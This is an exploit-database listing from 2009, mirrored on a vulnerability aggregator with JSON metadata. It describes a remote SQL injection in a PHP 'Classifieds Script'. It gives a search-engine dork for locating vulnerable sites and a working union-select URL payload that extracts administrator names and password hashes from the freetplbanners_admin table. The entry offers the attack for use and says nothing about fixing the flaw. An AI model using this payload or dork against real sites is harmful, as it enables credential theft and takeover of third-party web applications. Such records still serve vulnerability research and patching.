Search...

Classifieds Script type Remote SQL Injection Vulnerability

2009-12-30T00:00:00

ID EDB-ID:10833
Type exploitdb
Reporter Hussin X
Modified 2009-12-30T00:00:00

Description

Classifieds Script (type) Remote SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            Classifieds Script (type) Remote SQL Injection Vulnerability

|    Author: Hussin X
|
|    Home :  www.iq-ty.com&lt;http://www.iq-ty.com&gt;
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
| d0rk : inurl:"showcategory.php?type"


POC :

http://[server]/showcategory.php?type=6&cid=-1+union+select+1,unhex(hex(concat(admin_name,0x3e,pwd))),3,4,5+from+freetplbanners_admin--


#end

IQ-SecuritY FoRuM

JSON Vulners Source

Initial Source

{"id": "EDB-ID:10833", "hash": "4314572ab57bfe1cde8e3f6077412e94", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Classifieds Script type Remote SQL Injection Vulnerability", "description": "Classifieds Script (type) Remote SQL Injection Vulnerability. Webapps exploit for php platform", "published": "2009-12-30T00:00:00", "modified": "2009-12-30T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/10833/", "reporter": "Hussin X", "references": [], "cvelist": [], "lastseen": "2016-02-01T13:16:13", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/10833/", "sourceData": "Classifieds Script (type) Remote SQL Injection Vulnerability\r\n\r\n| Author: Hussin X\r\n|\r\n| Home : www.iq-ty.com<http://www.iq-ty.com>\r\n|\r\n| email: darkangel_g85[at]Yahoo[DoT]com\r\n| d0rk : inurl:\"showcategory.php?type\"\r\n\r\n\r\nPOC :\r\n\r\nhttp://[server]/showcategory.php?type=6&cid=-1+union+select+1,unhex(hex(concat(admin_name,0x3e,pwd))),3,4,5+from+freetplbanners_admin--\r\n\r\n\r\n#end\r\n\r\nIQ-SecuritY FoRuM\r\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}